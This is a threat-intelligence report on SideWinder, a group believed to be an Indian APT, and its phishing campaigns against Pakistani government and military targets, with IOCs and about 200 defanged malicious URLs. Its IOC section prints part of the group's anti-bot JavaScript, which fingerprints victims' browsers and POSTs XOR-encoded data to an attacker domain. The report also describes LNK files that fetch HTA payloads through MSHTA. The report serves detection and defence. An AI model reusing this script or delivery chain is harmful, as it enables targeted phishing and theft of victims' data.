ENGLISH
ENGLISH
01.06.2022

SideWinder.AntiBot.Script

Analysis of SideWinder's new infrastructure and tool that narrows their reach to Pakistan
Nikita Rostovcev
Analyst at APT Research Team, Group-IB

Alexander Badaev

Junior Analyst at APT Research Team, Group-IB
Group-IB Threat Intelligence researchers have discovered a new malicious infrastructure and a custom tool of the APT group SideWinder (aka Rattlesnake, Hardcore Nationalist, RAZOR TIGER, T-APT-04 and APT-C-17), a threat actor that is believed to be originating from India and primarily targeting Pakistan. The newly discovered custom tool, codenamed SideWinder.AntiBot.Script, is being used in the gang’s phishing attack against Pakistani targets. Group-IB Threat Intelligence team shares its findings so that security teams can more effectively identify SideWinder attacks.

Key findings

Over the last year, Group-IB Threat Intelligence system identified 92 IP addresses that have been used by SideWinder APT for phishing emails.
Pakistan remains the primary target for SideWinder. The attackers are especially interested in the Pakistani government organizations based on the discovered phishing document and public studies.
Phishing links in emails or posts that mimic legitimate notifications and services of government agencies and organizations in Pakistan are primary attack vectors of the gang.
SideWinder started using an anti-bot script to filter their victims - they are only interested in Pakistani users.
The group continues to distribute malicious files in ZIP archives with an LNK file inside, which downloads an HTA file from a remote server.

Upon discovery, Group-IB Threat Intelligence team notified relevant local authorities and shared its findings to make sure that the threat can be identified and contained at early stages. CERT-GIB also sent notifications to dedicated computer emergency response teams in Pakistan.

SideWinder Profile

The SideWinder APT is believed to be an Indian nation-state threat actor. In their attacks, SideWinder was seen targeting government, military, and economic sectors in Southeast Asia: in Afghanistan, Nepal, Sri Lanka, Bhutan, Myanmar, the Philippines, Bangladesh, Singapore, and China. However, since the discovery of the group in 2012, Pakistan has been the primary target of SideWinder. In the last year alone, several SideWinder’s attacks targeting Pakistan have been detected. SideWinder was particularly interested in the Pakistani military targets.

The Pakistani government even published an official advisory about SideWinder activity:

Image 1. Fragment of the official notification about SideWinder’s attacks

Group-IB researchers have repeatedly spotted phishing documents intended for Pakistani targets in public and private sector organizations.

For example, the following phishing document contains information about a proposal for a formal discussion of the impact of US withdrawal from Afghanistan on maritime security:

Image 2. Phishing document SHA-1: a74f9baa1791476c489942dd9e24c8c6fd0822cd

In addition, the group was seen cloning government websites to collect user credentials.
Below you can find a phishing page mimicking a government portal in Sri Lanka designed by SideWinder:

Image 3: Phishing page login panel - http://5.2.79[.]135/!/n/

SideWinder Network Infrastructure

Over the last year, Group-IB’s Threat Intelligence solution detected 92 IP addresses used by SideWinder. The servers were automatically detected by Group-IB and Threat Intelligence users immediately received a proactive notification about the appearance of the new malicious infrastructure.

The analysis of the servers revealed that they were primarily used for phishing attacks. SideWinder’s phishing attacks will be covered later in the text in more detail.

Below is a summary of 2.56.245[.]21, one of SideWinder’s servers. According to Group-IB data, the server has been in use by SideWinder since at least January 22, 2022.

Image 4: Network Indicators related to 2.56.245[.]21 Source: Group-IB Threat Intelligence

Thanks to Group-IB’s Network Graph Analysis tool, shown above, it was possible to discover that this address is used as the A-record for the following domains:
  • finance.pakgov[.]net;
  • vpn.pakgov[.]net;
  • csd.pakgov[.]net;
  • hajj.pakgov[.]net;
  • nadra.pakgov[.]net;
  • pt.pakgov[.]net;
  • flix.pakgov[.]net;
  • covid.pakgov[.]net.
As you may have guessed, these are all phishing domains mimicking legitimate domains of Pakistani governmental and non-governmental institutions, such as finance.gov.pk.

Image 5. A fragment of the network infrastructure associated with the SideWinder group. Source: Group-IB Threat Intelligence

Phishing categorization

Each of the previously mentioned servers detected by Group-IB Threat Intelligence system mimic the public services related to Pakistan. Some of them are:
While investigating these malicious domains, Group-IB researchers found a phishing link - "vpn.pakgov[.]net/Download-3b00fd1a" - which redirects to a legitimate domain "securevpn.com". This may indicate a temporary suspension of the malicious campaign or conversely the link could redirect to a malicious site in the future as part of a different campaign.

Image 6. Screenshot with redirect to legitimate securevpn.com

Also among the discovered phishing links, Group-IB researchers found a link that downloaded an application from the official Google Play store called "SecureVPN"

Image 7. Screenshot from the Google Play store

The app in question looks suspicious: it has only 10+ downloads. It was published by the author, “ross jack”, with only one project. Furthermore, the description of the application was copied from NordVPN's description:

Image 8. Screenshot from the Microsoft Edge extension store

Therefore, Group-IB researchers assume that the application most likely mimics the legitimate Secure VPN application of the same name. At runtime, this application performs the following requests:
  • hXXps://api.vpn-secure[.]co/secureVpn/;
  • hXXps://api.vpn-secure[.]co/secureVpn/register;
However, at the time of the research, they were unavailable, and a request to the root of the page redirects to the legitimate NordVPN domain.

Image 9. Request to the root of the api.vpn-secure[.]co

In 2020, Trend Micro researchers found similar malicious apps that were attributed to the SideWinder group. These apps were also uploaded to the Google Play Store. It is worth noting that at the time of writing we cannot confirm if the Secure VPN app developed by "ross jack" is 100% malicious. This research is ongoing.

Kill Chain

In this section we will take a closer look at the infection chain. As in previous SideWinder’s attacks, it all starts with a phishing link:
Group-IB researchers also found malicious links posted on Facebook:

Image 13. Screenshot of a malicious link on Facebook

Once the victim clicks on the link, an archive with a malicious .LNK file or RTF document is downloaded. In the case of LNK, the files have a Microsoft Word icon, making it appear more legitimate, encouraging people to open. Whether the initial vector was a phishing email or a phishing link posted on social media, the malicious payload is always launched using the DLL side-loading technique, which provides persistence and has RAT functionality.

SideWinder.AntiBot.Script

As soon as the recipient clicks on the link, the new tool, dubbed SideWinder.AntiBot.Script by Group-IB researchers, comes into play. The script checks the client browser environment and, based on several parameters, decides whether to issue a malicious file or redirect to a legitimate resource.

For example, let's take finance.pakgov[.]net which we have described a little already.
The phishing link appears as follows - hxxps://finance.pakgov[.]net/salary-a4222e91.
Let's first see what happens if we try to follow this link with settings different from a typical Pakistani user.

Image 14. Screenshot with hxxps://finance.pakgov[.]net/salary-a4222e91 request and redirect to legitimate finance.gov.pk

As you can see in the screenshot above, when a client visits this link, which the anti-bot script does not like, the script redirects to a legitimate document located on a legitimate resource: finance.gov.pk. And, the script won't even work if the client's IP address differs from Pakistan's - the client will automatically be redirected to the legitimate resource. These are common techniques that are used to avoid detection by threat researchers.

Image 15. Redirect to a legitimate document.

However, if you follow a link with an IP address from Pakistan, the anti-bot script will work.

Image 16. SideWinder.AntiBot.Script snippet (the full version of the script is available below in the list of indicators of compromise)

To begin with, the CAPTCHA page immediately catches the eye. While the user is waiting, the client's browser is profiled to give the final verdict.

Image 17. Screenshot of fake CloudFlare page

If the client does not pass the anti-bot script filtering, for example, by the parameter of the operating system used, then a corresponding message will be displayed.

Image 18. Screenshot of the platform compatibility error.

Detection of a client's browser environment

The script is written to collect everything it can reach to verify that the user is not a researcher or a security solution attempting to detect malicious code:
  • Geo-position - check;

Image 19. A snippet of SideWinder.AntiBot.Script

  • Version of the operating system - check;
  • Data about the user agent - check;
  • System language settings - check;
  • The number of logical processors - check;
  • Accessing the CredentialsContainer interface, which can return saved passwords from the browser if the necessary function is called. (not used );

Image 20. A snippet of SideWinder.AntiBot.Script

  • A feature that avoids automatic analysis using the Headless version of Chrome - check;

Image 21. A snippet of SideWinder.AntiBot.Script

  • A list of possible video cards used and checking their compliance with the screen size. (Images 22 and 23):

Image 24. A snippet of SideWinder.AntiBot.Script

  • Check for compliance with operating systems from the list:

Image 25. A snippet of SideWinder.AntiBot.Script

  • And most importantly, the function of issuing a malicious file and the function to redirect to a legitimate resource.

Image 26. A snippet of SideWinder.AntiBot.Script

However, in another script found on another malicious domain - finance.govpk-mail[.]net - the redirect function still led to a link with a payload:

Image 27. A snippet of SideWinder.AntiBot.Script

Accordingly, the structure of network requests on this domain is as follows:

Image 28. Screenshot with network requests

The screenshot above shows link clicks from the initial phishing link - hxxps://finance.govpk-mail[.]net/financecircular-38149cbd to the page with the script, which is responsible for releasing the malicious file:

Image 29. A piece of malicious code that issues a payload.

Payload

In one case the downloadable file (SHA1- 4421f214c91a08ac0318871c6f918cfffe36d039) was an archive named "Pay and Pension Increase Circular_Finance Division.zip"
The contents of this archive consist of files:
  • 64a889e35b10a902170abe092c6c6b8f16c66dd1 - Pay and Pension Increase Circular_Finance Division.pdf.lnk;
  • 5e5e038453fde5ddf57820783dd9ce8f5f042df2 - ~wnotification002.tmp;
  • 6a99ce5387c5b67602b2ef633bfbdc184e4d845c - ~wnotification003.tmp.

Image 30. Contents of "Pay and Pension Increase Circular_Finance Division.zip

"Pay and Pension Increase Circular_Finance Division.pdf.lnk" is a shortcut that contains a command to download and execute the file hxxps://finance.govpk-mail[.]net/15523/1/12443/2/0/0/1/1874254181/79DWxM3xhqvyZapU4oq7D3M8j5wB6f4HVHnbIEc/files-60b6e42b/hta using MSHTA.

Image 31. Contents of "Pay and Pension Increase Circular_Finance Division.pdf.lnk

Unfortunately, the second stage of the payload turned out to be inactive, so we got a "404 Not Found" error.

Image 32. Screenshot of the error receiving the second stage of the payload.

However, this attack is not unique to SideWinder. HTAs typically contain PowerShell, VBScript, or JavaScript, and the latter has been seen more often in recent attacks.
HTAs are typically used to download files for later use by the DLL-sideloading technique. In some cases, HTAs also upload a decoy document, usually in PDF format, to put the victim's attention down.

The use of this technique by this group was mentioned publicly by researchers from Sangfor Qianlimu Security Lab.

Image 33. Fragment of Kill Chain taken from https://mp.weixin.qq.com/s/Kkta59k7r81uIBjJvE9pCw

When using this technique, HTA will load the "Duser.dll" file and copy the system file "credwiz.exe" into the same directory. The "credwiz.exe" loads "Duser.dll" with the Dll Side-Loading technique, which in turn downloads and executes the final backdoor. The final backdoor allows the attacker:
  • Collect system information;
  • Collect list of files and paths to them;
  • Collect selected files;
  • Update commands and C2 addresses.

Conclusion

Given the SideWinder’s widespread activity deploying new command and control servers and the number of observed phishing links, Group-IB Threat Intelligence team decided to publish these findings so that potential targets in Pakistan identified as part of the research could check their networks and identify attacks by Sidewinder that are in early stages. If you believe you may be a victim of similar phishing campaigns or that you may be one of the attackers’ targets please reach out.
Try Group-IB Threat Intelligence Now
Optimize strategic, operational and tactical decision making with best-in-class threat intelligence

IOCs

Fragment of SideWinder.AntiBot.Script from https://finance.pakgov[.]net/salary-a4222e91
<script>
	function buttonClick() {
		if (navigator.geolocation) {
			navigator.geolocation.getCurrentPosition(showPosition);
		} else {
			x.innerHTML = 'Geolocation is not supported by this browser.';
		}
	}

	function showPosition(position) {
		alert(`lat ${position.coords.latitude} long ${position.coords.longitude}`);
	}
</script>
<script>
	var postUrl = 'https://finance.pakgov[.]net/733/1/670/2/0/0/1874372994/HvEdALWHsRoqS3eIArlDgXiyAcvV5TsjfqF7kVAK/files-8adb0199/ads';

	function encode(data, xorKey) {
		let enc = new TextEncoder();
		let dataBuff = enc.encode(data);
		let keyBuff = enc.encode(xorKey);

		let output = [];

		for (let i = 0; i < dataBuff.length; i++) output[i] = dataBuff[i] ^ keyBuff[i % keyBuff.length];

		return new Blob([new Uint8Array(output)]);
	}

	function redirect() {
		window.location.replace('https://www.finance.gov.pk/circulars/circular_14042022_2.pdf');
	}

	function postData(data) {
		try {
			var secretKey = '34-D4-3D-5B-6E-31-77-E7-27-06-96-CE-BE-E6-B5';
			const finalData = JSON.stringify(data);
			const encriptedData = encode(finalData, secretKey);

			fetch(postUrl, {
				method: 'POST',
				headers: {
					'Content-Type': 'application/text'
				},
				body: encriptedData
			})
				.then(() => {
					redirect();
				})
				.catch((err) => {
					redirect();
				});
		} catch (err) {
			redirect();
		}
	}

	function isCanvasSupported() {
		var elem = document.createElement('canvas');
		return !!(elem.getContext && elem.getContext('2d'));
	}

	function getBrowserDetails(gpuData) {
		var result = {};
		try {
			result.gpuData = gpuData;
			result.navigatorInfo = {
				oscpu: navigator.oscpu,
				credentials: navigator.credentials,
				clipboard: navigator.clipboard,
				hardwareConcurrency: navigator.hardwareConcurrency,
				geolocation: navigator.geolocation,
				userAgent: navigator.userAgent,
				language: navigator.language,
				languages: navigator.languages
			};
			try {
				result.canvasSupported = isCanvasSupported();
			} catch (canvasErr) {}

			result.utcOffset = new Date().getTimezoneOffset() / 60;
			postData(result);
		} catch (err) {
			redirect();
		}
	}

	function postDetection(data) {
		var detectionPostUrl = 'https://finance.pakgov[.]net/733/1/670/2/0/0/1874372994/HvEdALWHsRoqS3eIArlDgXiyAcvV5TsjfqF7kVAK/files-867fdc8a/adscom';
		try {
			fetch(detectionPostUrl, {
				method: 'POST',
				headers: {
					'Content-Type': 'application/text'
				},
				body: data
			})
				.then(() => {
					redirect();
				})
				.catch((err) => {
					redirect();
				});
		} catch (err) {
			redirect();
		}
	}
Phishing URLs
https://ministryofinterior.fileserve[.]work/189/1/431/2/0/0/1817120272/n6hq7tuwvckap8aqky5iyudrhxtfwxg9rnvsr5qd/files-ea38b848/hta
https://cnmm.int-secure[.]org/2557/1/51442/3/3/0/1834645296/files-69552039/0/data
https://cnmm.int-secure[.]org/2557/1/51442/3/3/0/1835115357/files-10f645a5/0
https://cnmm.int-secure[.]org/2557/1/51442/3/1/1/1834645296/files-0e3ab90b/0
https://cnmm.int-secure[.]org/2557/1/51442/3/1/1/1835115357/files-0efe466b/0
https://cnmm.int-secure[.]org/2557/1/51442/3/0/1835115357/files-10f645a5/0/data
https://cmm.int-secure[.]org/2557/1/51442/2/0/0/0/files-0a14cf32/file.rtf
https://cnmm.int-secure[.]org/2557/1/51442/2/0/0/0/files-0a14cf32/file.rtf
https://independenceday.pafwa[.]info/87/1/39/2/0/0/1816006329/5iendp3hdsknaqhlibalqtlqalh1nw6bqqubvsea/files-2e615636/hta
https://cloud-apt[.]net/202/h5lvzvpjay89njsklmam4psgoxdnzrgs0ybwrvt7/20/11248/371a005a
https://independenceday.pafwa[.]info/87/1/39/2/0/0/1816006329
https://as.pakmarines[.]com/4982/1/1555/3/1/1/1844828428/files-8a7a725b/0
https://as.pakmarines[.]com/4982/1/1555/3/1/1/1844827718/files-bb0e9609/0
https://dsadsa.pakmarines[.]com/4975/1/1555/3/1/1/1837824751/files-5352474c/0
https://pqa.gov.pakmarines[.]com/4958/1/2657/2/0/0/0/files-f8032b2c/file.rtf
https://pqa.gov.pakmarines[.]com/4958/1/2657/2/0/0/0/files-f8032b2c
https://luckydraw.csd-pk[.]co/137/1/39/2/0/0/1812896830/tfucucdhcs3bjtzxyegiy7jy0qsxlmwpuetiphsv/files-0909d81c/hta
https://luckydraw.csd-pk[.]co/137/1/39/2/0/0/1812896830/tfucucdhcs3bjtzxyegiy7jy0qsxlmwpuetiphsv%20/files-0909d81c/hta
https://defencelk.cvix[.]live/3023/1/54082/2/0/0/0/m/files-0c31ed2d/file.rtf
https://mailoutlookcom.cvix[.]live/2912/1/53734/2/0/0/0/m/files-74a3adce/file.rtf
https://karachishipyard.krlwin[.]org/14231/1/3025/2/0/0/0/m/files-5ad64a22/file.rtf
https://fbr.pak-web[.]com/14548/1/16870/2/0/0/1815657101/ut5paxr8gwxsmv0qczncwpv1qhefzbr5ux5wbupt/files-48dde7df/hta
https://fbr.pak-web[.]com/14548/1/16870/2/0/0/1815655910
https://mofa-gov-pk.fdn-trace[.]net/14017/1/3529/3/3/0/1835460795/files-f65724ef/0/data
https://dgmp-paknavy.mod-pk[.]com/14325/1/10/2/0/0/0/m/files-5291bef6/file.rtf
https://dgmp-paknavy.mod-pk[.]com/14325/1/10/3/3/0/1865884360/uaixa3upvnbi8gnaga2egfgunqxzuvvieq4r3ytr/files-984c52a9/0/data
https://dgmp-paknavy.mod-pk[.]com/14325/1/10/2/0/0/0/m/files-5291bef6
https://dgmp-paknavy.mod-pk[.]com/14325/1/10/3/1/1/1865884360/uaixa3upvnbi8gnaga2egfgunqxzuvvieq4r3ytr/files-f3046d06/1
https://islamabadclub.docuserve[.]ltd/327/1/1355/2/0/1/1827674795/s5wqcolcbycfkvdb2559rb6kkulhmakgf2lrjd5e/files-cfa8d5c4/hta
https://mofa.iugur[.]live/2623/1/45326/3/3/0/1833591826/files-8b7ce54d/0/data
https://mofa.iugur[.]live/2623/1/45326/2/0/0/0/files-5d797627/file.rtf
https://srilankanavy.ksew[.]org/5471/1/1101/3/1/1/1870354104/v%e2%80%a6
https://srilankanavy.ksew[.]org/5471/1/1101/3/3/0/1870354104/vb2narnbuxuwxaavjxzhv8p5cs4qa5nziizebg1t/files-72d56628/0/data
https://srilankanavy.ksew[.]org/5471/1/1101/2/0/0/0/m/files-cd6e6dbd
https://srilankanavy.ksew[.]org/5471/1/1101/2/0/0/0/m/files-cd6e6dbd/file.rtf
https://srilankanavy.ksew[.]org/5471/1/1101/3/1/1/1870354104/vb2narnbuxuwxaavjxzhv8p5cs4qa5nziizebg1t/files-17eb20c8/1
https://paknavy.edu-cx[.]org/2862/1/35022/2/0/0/0/m/files-5c23f212/file.rtf
https://paknavy.edu-cx[.]org/2862/1/35022/3/3/1/1819781955/auvid5r6ddzaaazj2ayijgnnhpc1rolg6hdktlop/files-d2ab4d1d/1/lapd
https://paknavy.edu-cx[.]org/2862/1/35022/2/0/0/0/m
https://paknavy.edu-cx[.]org/2862/1/35022/3/1/1/1819781925/auvid5r6ddzaaazj2ayijgnnhpc1rolg6hdktlop/files-53ac9753/1/lkjhg
https://paknavy.edu-cx[.]org/2862/1/35022/3/3/1/1819785343/auvid5r6ddzaaazj2ayijgnnhpc1rolg6hdktlop/files-17df7279/1/cuui
https://paknavy.edu-cx[.]org/2862/1/35022/3/3/0/1819558314/xnbyd5o9i6rvjjg1gby3dpji5g5ebonzjs0xbiaw/files-b3f455a7/0/data
https://paknavy.edu-cx[.]org/2862/1/35022/3/3/1/1819554413/zagu2jdbagoa8m2y5qqr48jaudayp7qmnvkfcvd3/files-a1af6aa0/1/cuui
https://paknavy.edu-cx[.]org/2862/1/35022/3/1/1/1819784985/auvid5r6ddzaaazj2ayijgnnhpc1rolg6hdktlop/files-bacfbe86/1/lkjhg
https://paknavy.edu-cx[.]org/2862/1/35022/3/3/0/1819777052/auvid5r6ddzaaazj2ayijgnnhpc1rolg6hdktlop/files-ca0ad365/0/data
https://paknavy.edu-cx[.]org/2862/1/35022/3/1/1/1819574126/xnbyd5o9i6rvjjg1gby3dpji5g5ebonzjs0xbiaw/files-9dd30d62/1/lkjhg
https://paknavy.edu-cx[.]org/2862/1/35022/3/1/1/1819554425/zagu2jdbagoa8m2y5qqr48jaudayp7qmnvkfcvd3/files-3b2e6b86/1/lkjhg
https://paknavy.edu-cx[.]org/2862/1/35022/2/0/0/0/m/files-5c23f212
https://mail.paf-gov[.]net/15158/1/15085/2/0/1/1825882888/aqsty5rve6jaj936ysndgwntpmef0vjshfvusaqg/files-8bfcd365/hta
https://dasds.pak-gov[.]com/14369/1/20481/3/1/1/1837816729/files-0cf1cfc9/0
https://mail.pak-gov[.]com/14368/1/19/2/0/0/1837797689/files-31c2b526/hta
https://pafroa.pak-gov[.]com/14396/1/13/2/0/0/1845451406/nxpoagtu009qrujbymrz0sevpzlw3cipjvkznp7h/files-439f37c3/hta
https://mail.pak-gov[.]com/14393/1/19/2/0/0/1845235990/s9av6kavghbvfpcxmf5bc5rnqc1mhy9zyza3dbec/files-2b9e84c4/hta
https://dasdsadsa.pak-gov[.]com/14390/1/20481/2/0/0/1844628837/baoil1hrs1kbbaaeyb3bh3yu8f3pluos3ov4njod/files-5930a9d7/hta
https://adssda.cr20g[.]org/2706/1/50367/3/1/1/1844827283/files-4c2990c8/0
https://dsasa.cr20g[.]org/2702/1/50367/3/1/1/1837819353/files-13af613a/0
https://dsasa.cr20g[.]org/2702/1/50367/2/0/0/1837858764/files-1254f2f4/hta
https://dsasa.cr20g[.]org/2702/1/50367/3/1/1/1837820043/files-a18c62fb/0
https://dsasa.cr20g[.]org/2702/1/50367/3/1/1/1837821776/files-58d8365f/0
https://pmaesa.bahariafoundation[.]org/4926/1/2298/3/3/0/1838850914/files-737c8e80/0/data
https://pmaesa.bahariafoundation[.]org/4926/1/2298/3/1/1/1838850914/files-b486316c/0
https://dgpr.paknvay-pk[.]net/5330/1/1330/2/0/0/0/m/files-4d9d0395/file.rtf
https://careitservices.paknvay-pk[.]net/5359/1/4586/2/0/0/0/m/files-266ad911/file.rtf
https:/dgpr.paknvay-pk[.]net/5330/1/1330/2/0/0/0/m/files-4d9d0395/file.rtf
https://careitservices.paknvay-pk[.]net/5359/1/4586/2/0/0/0/m/files-266ad911/file.rtf
https://dgpr.paknvay-pk[.]net/5330/1/1330/2/0/0/0/m/files-4d9d0395
https://mofa.paknvay-pk[.]net/5312/1/1219/2/0/0/0/m/files-2768c4e9/filertf
https://cabinet-gov-pk.ministry-pk[.]net/14300/1/1273/2/0/0/0/m/files-68ebf815/file.rtf
https://finance.govpk-mail[.]net/15523/1/12443/2/0/1/1874254181/79dwxm3xhqvyzzapu4oq7d3m8j5wb6f4hvhnbiec/files-60b6e42b/hta
https://mailmofagovpk.cdn-pak[.]net/2494/1/50382/2/0/0/1836338576/files-bf3af810/hta
https://mailmofagovpk.cdn-pak[.]net/2494/1/50382/3/3/0/1836348839/files-425a30b0/0/data
https://mailmofagovpk.cdn-pak[.]net/2494/1/50382/3/3/1/1836350211/files-4f4899fa/1/cuui
https://ibn.cdn-pak[.]net/2454/1/50345/2/0/0/1829584899/files-951f6dc5/hta
https://mailmofagovpk.cdn-pak[.]net/2494/1/50382/3/1/1/1836350209/files-eee0fd0c/1/lkjhg
https://mailmofagovpk.cdn-pak[.]net/2494/1/50382/3/1/1/1836350209/files-567e2fe7/1/plaoi
https://mailmofagovpk.cdn-pak[.]net/2494/1/50382/3/3/0/1836348839/files-425a30b0/0
https://mailmofagovpk.cdn-pak[.]net/2494/1/50382/3/1/1/1836348839
https://mailmofagovpk.cdn-pak[.]net/2494/1/50382/3/1/1/1836348839/files-d5def770
https://mailmofagovpk.cdn-pak[.]net/2494/1/50382/3/1/1/1836348839/files-d5def770/0
https://mailmofagovpk.cdn-pak[.]net/2494/1/50382/2/0/0/1836338576
https://mailmofagovpk.cdn-pak[.]net/2494/1/50382/2/0/0/1836338576/files-bf3af810
https://ltd.cdn-pak[.]net/2456/1/50349/3/3/0/1828840216/files-76eb3bdb/0/data
https://ibn.cdn-pak[.]net/2454/1/50345/3/1/1/1829585134/files-28f58d48/0
https://mailmofagovpk.cdn-pak[.]net/2494/1/50382/3/3/0/1836549175/files-b4d2e217/0/data
https://ltd.cdn-pak[.]net/2456/1/50349/3/1/1/1828840216/files-6d8ccb25/0
https://ltd.cdn-pak[.]net/2456/1/50349/3/3/0/1829361416/files-e6b3d411/0/data
https://mailmofagovpk.cdn-pak[.]net/2494/1/50382/3/1/1/1836347963/files-b85b6f22/0
https://sppc.moma-pk[.]org/5281/1/4265/2/0/0/0/m/files-d2608a99/file.rtf
https://bangladeshmarineacademylibrary.ppinewsagency[.]live/5083/1/3417/2/0/0/0/m/files-76793138/file.rtf
https://behr.ppinewsagency[.]live/5098/1/1069/2/0/0/0/m/files-3607001e/file.rtf
https://behr.ppinewsagency[.]live/5098/1/1069/2/0/0/m/files-3607001e/file.rtf
https://maritimepakistan.kpt-pk[.]net/5434/1/3694/2/0/0/0/m/files-ce32ed85/file.rtf
https://paf.gov-mail[.]net/13621/1/18844/2/0/0/1390324815/files-b74d99d6/hta
https://csd.pakgov[.]net/download-1a402536
https://financial.pakgov[.]net/salary-0b936cdb
https://finance.pakgov[.]net/salary-a4222e91
https://csd.pakgov[.]net/promo-bc8ae3a7
https://csd.pakgov[.]net/offers-7bba26a3
https://csd.pakgov[.]net/offers-2117dbfd
https://csd.pakgov[.]net/offers-e3f1a111
https://csd.pakgov[.]net/offers-4a99b077
https://csd.pakgov[.]net/offers-61139575
https://csd.pakgov[.]net/offers-107dcec1
https://csd.pakgov[.]net/offers-ffb08372
https://csd.pakgov[.]net/offers-b7c07084
https://csd.pakgov[.]net/offers-20140ab1
https://csd.pakgov[.]net/offers-4cf40546
https://csd.pakgov[.]net/offers-875c9a16
https://csd.pakgov[.]net/offers-d8bcbda6
https://csd.pakgov[.]net/offers-de5aebcb
https://csd.pakgov[.]net/offers-e0017ab7
https://csd.pakgov[.]net/offers-940993e8
https://csd.pakgov[.]net/offers-716b0b9b
https://csd.pakgov[.]net/offers-c399b454
https://csd.pakgov[.]net/offers-6b60fd58
https://csd.pakgov[.]net/offers-1b24b9c9
https://csd.pakgov[.]net/offers-2025844a
https://csd.pakgov[.]net/offers-eb50eac1
https://csd.pakgov[.]net/offers-080e18cd
https://flix.pakgov[.]net/flix-93cc77bd
https://hajj.pakgov[.]net/hajj-c4d768c5
https://pt.pakgov[.]net/pt-02923ec0
https://wsde.pakgov[.]net/wsde-37591f93
https://vpn.pakgov[.]net/Download-3b00fd1a
https://ncoc.pakgov[.]net/BoosterDose-2a0ea925
https://ncoc.pakgov[.]net/BoosterDose-7f99b859
https://ncoc.pakgov[.]net/BoosterDose-72ef6188
https://ncoc.pakgov[.]net/BoosterDose-abf39ed6
https://ncoc.pakgov[.]net/BoosterDose-5bf9f036
https://ncoc.pakgov[.]net/BoosterDose-5242ee75
https://ncoc.pakgov[.]net/BoosterDose-71542b9c
https://covid.pakgov[.]net/guideline-88cbf7b6
https://covid.pakgov[.]net/guideline-4b62099a
https://covid.pakgov[.]net/guideline-01dc5084
https://covid.pakgov[.]net/guideline-98b4fb5f
https://covid.pakgov[.]net/guideline-b8dc1e02
https://covid.pakgov[.]net/guideline-fb0a4420
https://vpn.pakgov[.]net/SecureVPN-a60b0a5e
https://ncoc.pakgov[.]net/BoosterDose-7f27a83f
https://covid.pakgov[.]net/guideline-f01715e5
https://ncoc.pakgov[.]net/BoosterDose-35ccf8d0
https://ncoc.pakgov[.]net/BoosterDose-a9e0d833
https://ncoc.pakgov[.]net/BoosterDose-683adf95
https://ncoc.pakgov[.]net/BoosterDose-6dc5de75
https://ncoc.pakgov[.]net/BoosterDose-4dbf35c4
https://ncoc.pakgov[.]net/BoosterDose-57ed8e9c
https://ncoc.pakgov[.]net/BoosterDose-8d4dd50e
https://ncoc.pakgov[.]net/BoosterDose-552bdc8e
https://covid.pakgov[.]net/guidelines-dfe62deb
https://covid.pakgov[.]net/guidelines-9d5140c8
https://covid.pakgov[.]net/guidelines-e7560478
https://covid.pakgov[.]net/guidelines-ad54cf4f
https://covid.pakgov[.]net/guidelines-7a4e0bec
https://covid.pakgov[.]net/guidelines-dcfdc3cf
https://covid.pakgov[.]net/guidelines-e13c2af9
https://covid.pakgov[.]net/guidelines-a44a9d99
https://ncoc.pakgov[.]net/BoosterDose-9ab13d0a
https://ncoc.pakgov[.]net/BoosterDose-971cda7a
https://ncoc.pakgov[.]net/BoosterDose-278002a8
https://ncoc.pakgov[.]net/BoosterDose-d43a2c2c
https://ncoc.pakgov[.]net/BoosterDose-deba45fa
https://ncoc.pakgov[.]net/BoosterDose-8c400f63
https://ncoc.pakgov[.]net/BoosterDose-098e2e01
https://ncoc.pakgov[.]net/BoosterDose-700fdb8f
https://ncoc.pakgov[.]net/BoosterDose-a1e81804
https://ncoc.pakgov[.]net/BoosterDose-68af2ae1
https://nhsrc.pakgov[.]net/2ndDoseOptions-86bf668a
https://ncoc.pakgov[.]net/BoosterDose-dcb1c65c
https://covid.pakgov[.]net/NewGuidelines-5dcb362a
https://nadra.pakgov[.]net/certificate-7af695ec
https://nadra.pakgov[.]net/certificate-4c8d8111
https://nadra.pakgov[.]net/certificate-4f00a009
https://nadra.pakgov[.]net/certificate-ad6d7552
https://nadra.pakgov[.]net/certificate-c34b0ce5
https://nadra.pakgov[.]net/certificate-b14a482c
https://nadra.pakgov[.]net/certificate-d87c8397
https://ww2.pakgov[.]net/news-eb9bf291
https://ji.pakgov[.]net/jb-18c88b08
https://news.bitlyy[.]me/news-5ffaf1d9
https://csd.bitlyy[.]me/download-73ba5be5
https://t.bitlyy[.]me/news-2fb36091
https://shoprex.bitlyy[.]me/offers-42cc5dc1
https://shoprex.bitlyy[.]me/offers-406bb25b
https://shoprex.bitlyy[.]me/offers-2cedda5a
https://shoprex.bitlyy[.]me/offers-a774a277
https://shoprex.bitlyy[.]me/offers-d0b602d0
https://shoprex.bitlyy[.]me/offers-fdef6d0b
https://shoprex.bitlyy[.]me/offers-31f0c07d
https://shoprex.bitlyy[.]me/offers-4581da54
https://telemart.bitlyy[.]me/deals-7973f6a9
https://telemart.bitlyy[.]me/deals-3affd2bb
https://telemart.bitlyy[.]me/deals-d0cbda13
https://telemart.bitlyy[.]me/deals-22c50976
https://telemart.bitlyy[.]me/deals-8702ddc9
https://telemart.bitlyy[.]me/deals-f26c2221
https://telemart.bitlyy[.]me/deals-6d180fe2
https://telemart.bitlyy[.]me/deals-d82fde01
https://telemart.bitlyy[.]me/deals-68d2fe01
https://telemart.bitlyy[.]me/deals-067a0162
https://telemart.bitlyy[.]me/deals-9221d8fb
https://telemart.bitlyy[.]me/deals-597a2164
https://telemart.bitlyy[.]me/deals-45a35ab5
https://telemart.bitlyy[.]me/deals-bde12f35
https://telemart.bitlyy[.]me/deals-0b509b57
https://telemart.bitlyy[.]me/deals-e22aafa1
https://telemart.bitlyy[.]me/deals-61b95365
https://telemart.bitlyy[.]me/deals-70afa698
https://faujifoundation.bitlyy[.]me/offer-55f9918f
https://askari.bitlyy[.]me/offer-723864bf
https://askari.bitlyy[.]me/offer-eaec3587
https://askaribank.bitlyy[.]me/offer-6ab56fa7
https://askaribank.bitlyy[.]me/offer-72bd35f7
https://askaribank.bitlyy[.]me/offers-065a5145
https://csd.bitlyy[.]me/offers-2b679e32
https://islamicfinder.bitlyy[.]me/pk-d667071f
https://islamicfinder.bitlyy[.]me/pk-ee17652a
https://islamicfinder.bitlyy[.]me/pk-5bc259ee
https://islamicfinder.bitlyy[.]me/pk-3803c186
https://islamicfinder.bitlyy[.]me/pk-4af34d9f
https://islamicfinder.bitlyy[.]me/pk-2c8df9c3
https://islamicfinder.bitlyy[.]me/pk-1522774b
https://islamicfinder.bitlyy[.]me/pk-2ab210c2
https://islamicfinder.bitlyy[.]me/pk-0d748636
https://islamicfinder.bitlyy[.]me/pk-0e57e1b5
